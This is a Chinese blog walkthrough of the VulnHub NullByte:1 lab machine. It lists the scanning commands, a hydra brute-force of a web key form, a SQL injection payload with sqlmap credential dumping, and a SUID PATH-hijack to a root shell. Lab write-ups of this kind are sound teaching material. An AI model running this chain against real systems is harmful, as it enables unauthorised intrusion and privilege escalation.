NullByte-1

于 2024-08-09 09:49:46 发布
阅读量368 收藏 3
点赞数 15
分类专栏: vulnhub靶场 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/141053699
版权

一、靶机介绍

名称:NullByte:1

发布日期:2015年8月1日

Download (Mirror): https://download.vulnhub.com/nullbyte/NullByte.ova.zip

二、信息收集

扫描ip

arp-scan -l

端口扫描

nmap -p- 192.168.81.130

nmap -sT -sV -sC -O -p80,111,777,47505 192.168.81.130

可以看到ssh端口开在777

gobuster目录爆破

apt update  
apt install gobuster
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u 192.168.81.130

发现几个目录

phpmyadmin

爆破没有成功,尝试其他地方找突破口

查看网页

页面上有图像。 在页面源上没有找到任何内容。 但是图像中可能隐藏了一些东西,因此,使用exiftool读取图像,因此下载该图像

root@kali:~# exiftool main.gif

发现Comment处有一串字符kzMb5nVYJw,可能是密码或者目录

发现需要输入key,hydra脚本爆破,由于是post请求,参数要添加http-form-post,用两个^包围要暴力破解的插值,并写上排除的字段invalid key(即出现哪些字符表示失败)。由于hydra脚本强制要求添加一个-l参数表示login登录账号,我们这里随便填写一个即可

hydra 192.168.81.130 -l admin -P /usr/share/wordlists/rockyou.txt http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key"

破解密钥为elite

输入密匙,跳转到下面的页面,要求输入username,猜测username处可能存在注入

输入万能密码,登录成功,查出所有人的账号

" or 1=1 -- -

说明存在sql注入

sqlmap.py扫描

查找其中的用户名和密码

得到ramses/YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

c6d6bd7ebf806f43c76acc3681703b81 32位md5

md5解码

三、getshell

使用ramses/omega连接ssh

四、提权

查看具有SUID权限的二进制文件

find / -perm -u=s -type f 2>/dev/null

发现/var/www/backup/procwatch的SUID位已启用

执行procwatch 的时候,和执行ps 一样的效果
我们执行ps 调用的是bash 他调用的是sh
如果把sh的内容改了,那么大概率OK的

cd /var/www/backup
ls -la

 echo "/bin/sh"  > ps
 chmod 777 ps
 echo $PATH
 export PATH=.:$PATH
 ./procwatch

到此打靶结束

五、总结

tips1: exiftool 查看图片隐藏信息

tips2: 字符串也有可能是目录

安全beginner
关注
  • 15
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kollapse Lite: Null Byte-开源
05-13
**Kollapse Lite: Null Byte 开源工具详解** 在网络安全领域,发现并利用漏洞是至关重要的。其中,"空字节"漏洞是一种特定类型的Web服务器安全问题,可能导致拒绝服务(Denial of Service,简称DoS)攻击。Kollapse...
byte-buffer:JavaScript的ArrayBufferDataView的包装器可简化读写操作
05-12
npm install byte-buffer 或在浏览器中使用: dist/byte-buffer.js dist/byte-buffer.min.js 用法 作为ECMAScript模块: import ByteBuffer from 'byte-buffer' ; const b = new ByteBuffer ( ) ; 在CommonJS...
红队打靶:vulnhub靶机之-------NullByte打靶思路
最新发布
m0_55994898的博客
12-11 1168
查看靶机介绍,提示使用的是DHCP,自动分配的方式进行的好的,安装好后,开始打靶!!
byte-buddy 1.9.6 简述及原理1
undergrowth的专栏
01-15 9556
byte-buddy 1.9.6 简述及原理1 概述 参考 https://github.com/raphw/byte-buddy https://github.com/diguage/byte-buddy-tutorial https://blog.csdn.net/qyongkang/article/details/7799603 -javaagent参数使用 核心Code Byt...
windows Python3报错 ValueError: embedded null byte
wangjinyu124419的博客
12-22 5420
调用爬取推特的twint库时候代码报错: Traceback (most recent call last): File "D:/pycharm project/twint/wangjinyu.py", line 10, in <module> twint.run.Search(c) File "D:\pycharm project\twint\twint\run....
ValueError:embedden null byte 报错
Great haste makes great waste
01-26 7573
今天遇到个比较奇怪的错误: ValueError: embedded null byte 后来在How to fix Python error: ValueError: embedded null byte 看到了解决方案, 然后按下图改正后就可以了, 其实我想改成 zh-CN 或者 zh-cn 都试了下,也是报错,最后就只能是en 了。
报错解决:Error: line contains NULL byte
热门推荐
花开花落,人走茶凉
03-11 1万+
这句报错的意思的,csv读取的内容的某行内含有空字节 在Python里空字节是 \x00 In [1]: a = '\0' In [2]: a Out[2]: '\x00' In [3]: b = '\x00' In [4]: b Out[4]: '\x00' In [5]: a == b Out[5]: True 先造个这样错误的文件出来,请在PyCharm里打印出来,然后把打印结果复制到一个...
【Python】读取CSV/Excel文件报错ParserError: NULL byte detected.解决方法
Asher117的博客
12-01 6792
读取CSV文件报错如下: ParserError: NULL byte detected. This byte cannot be processed in Python’s native csv library at the moment, so please pass in engine=‘c’ instead 解决方法,添加参数error_bad_lines=False即可 pd.read_...
Null Byte Injection
公众号shadow sock7
06-04 964
参考: http://hakipedia.com/index.php/Poison_Null_Byte https://security.stackexchange.com/questions/66414/getting-null-byte-injection-attacks-to-work-with-php-5-2-17
ParserError: NULL byte detected. This byte cannot be processed in Python‘s native csv library
data+scenario+science+insight
10-30 2128
ParserError: NULL byte detected. This byte cannot be processed in Python's native csv library at the moment, so please pass in engine='c' instead 目录 ParserError: NULL byte detected. This byte cannot be processed in Python's native csv library at the mo
python3.8打包后运行报错:“embedded null byte“的解决方案
xiaotuwai8的博客
10-20 3487
python3.8打包生成的文件在别的电脑上运行报错:“embedded null byte” 解决办法:加入如下代码,再次打包,未报错 import locale, time locale.setlocale(locale.LC_ALL,'en') locale.setlocale(locale.LC_CTYPE,'chinese')
python csv error: line contains null byte
lcwy220的博客
01-25 7150
Python的csv包固有问题 实践证明,当使用csv读取文件时,一旦文件里包含了’\0’或则’\x00’这种字符串时,会报错显示‘line contains null byte’。 一部分原因是文件中本身就存在这样的字符串,另一可能原因是该csv文件是从excel文件转换而来的,那么简单的处理的方式就是重新保存成csv。 如果不想该文件,就需要将这些可能的null byte抽取掉。以下代码: w...
C#中Byte转换相关的函数
09-02
1. **将一个对象转换为Byte对象** 函数`GetByte(object o)`用于尝试将任意类型的对象转换为Byte类型。它首先检查输入对象`o`是否为null,然后尝试使用`TryParse`方法将`o.ToString().Trim()`的结果解析为Byte。如果...
Java 图片与byte数组互相转换实例
08-31
= -1) { output.write(buf, 0, numBytesRead); } data = output.toByteArray(); } catch (FileNotFoundException ex1) { ex1.printStackTrace(); } catch (IOException ex1) { ex1.printStackTrace(); } ...
java中文件的MD5和SHA-1的使用
07-03
"Java 中文件的 MD5 和 SHA-1 的使用" Java 中提供了一个类 java.security.MessageDigest,該类是一种提供密码安全消息摘要如 SHA-1 和 MD5 功能的引擎类。该类可以用来计算文件的 MD5 和 SHA-1 值,不需要额外使用...
Android byte[] 和 String互相转换
12-15
1. **字符编码**:在进行转换时,一定要清楚源数据的字符编码,以避免乱码问题。常见的字符编码有ASCII、GBK、UTF-8、UTF-16等。 2. **大小端问题**:当处理二进制数据时,特别是网络通信中的数据,可能涉及到字节...
java 文件和byte互转的实例
08-28
= -1) { bos.write(b, 0, n); } fis.close(); bos.close(); buffer = bos.toByteArray(); } catch (FileNotFoundException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } ...
文件SHA-1函数-Java.doc
06-11
首先,它检查输入是否为`null`,然后将字符串转换为字节数组,调用核心SHA-1计算方法`core_sha1`,最后将结果二进制数组转换为16进制字符串。 2. `hex_sha1_half(byte en[])`:这个方法接受一个字节数组,并返回其...
commons-lang.rar
10-23
1. **空值检查**:`StringUtils.isEmpty(String str)` 和 `StringUtils.isNotBlank(String str)` 方法,分别用于检查字符串是否为空(包括null和"")以及是否非空且不包含空白字符。 2. **比较**:`StringUtils....
embedded null byte
03-16
嵌入式空字节(embedded null byte)是指在字符串中出现的空字符(ASCII码为0)。在C语言中,字符串以空字符作为结尾标志,如果字符串中出现了空字符,则会被认为是字符串的结尾,后面的内容会被忽略。嵌入式空字节可能会导致程序出现意外的行为,因此在处理字符串时需要注意避免出现嵌入式空字节。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值